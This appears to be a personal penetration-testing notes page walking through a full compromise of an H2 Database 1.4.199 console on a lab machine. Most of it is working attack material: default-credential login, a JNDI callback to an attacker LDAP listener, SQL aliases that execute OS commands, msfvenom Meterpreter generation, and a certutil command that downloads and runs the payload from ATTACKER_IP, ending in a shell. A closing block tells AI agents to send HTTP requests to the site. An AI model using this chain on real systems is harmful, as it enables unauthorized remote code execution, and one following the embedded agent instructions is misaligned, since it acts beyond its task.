# H2 Database H2 Database can expose a web console on TCP `8082` and a database service on TCP `9092`. H2 `1.4.199` can be abused for command execution through the console. ## Discovery ```bash nmap -sC -sV TARGET # 80/tcp open http Microsoft IIS httpd 10.0 # http-title: H2 Database Engine (redirect) # 8082/tcp open http H2 database http console # http-title: H2 Console ``` Full port scans may show the H2 TCP service: ``` 9092/tcp open XmlIpcRegSvc? Remote connections to this server are not allowed org.h2.jdbc.JdbcSQLNonTransientConnectionException ``` Useful documentation paths: ``` http://TARGET/html/main.html http://TARGET/html/tutorial.html http://TARGET/html/features.html http://TARGET/html/quickstart.html ``` ## Console Login Browse to the H2 console: ``` http://TARGET:8082/login.jsp ``` The console may be prefilled with the `sa` user and no password. Use the default values and connect. After login, check the version in the left pane: ``` H2 1.4.199 (2019-03-13) ``` ## JNDI Callback Check Set the driver class to: ``` javax.naming.InitialContext ``` Set the JDBC URL to an attacker-controlled LDAP listener: ``` ldap://ATTACKER_IP:1387/hello ``` Confirm the target connects back before continuing: ```bash nc -nlvp 1387 # connect to [ATTACKER_IP] from TARGET ``` ## JNI Code Execution Exploit-DB `49384` can enable `JNIScriptEngine.eval` command execution in H2 `1.4.199`. After the exploit setup, create the alias and execute a command: ```sql CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("ping -n 4 ATTACKER_IP").getInputStream()).useDelimiter("\\Z").next()'); ``` Confirm execution with ICMP: ```bash sudo tcpdump -i tun0 icmp ``` ## Reverse Shell Create a Meterpreter payload and handler: ```bash msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=80 -f exe -o met.exe msfconsole use multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST ATTACKER_IP set LPORT 80 set ExitOnSession false run -j ``` Use H2 command execution to download and run it: ```sql CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -f http://ATTACKER_IP:8000/met.exe C:\\Windows\\Temp\\met.exe").getInputStream()).useDelimiter("\\Z").next()'); CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\Windows\\Temp\\met.exe").getInputStream()).useDelimiter("\\Z").next()'); ``` Successful access: ``` Meterpreter session opened Computer : JACKO OS : Windows 10 1909 (10.0 Build 18363). Architecture : x64 Domain : WORKGROUP Meterpreter : x64/windows meterpreter > shell C:\Program Files (x86)\H2\service>whoami jacko\tony ``` ## References * * --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/h2-database.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.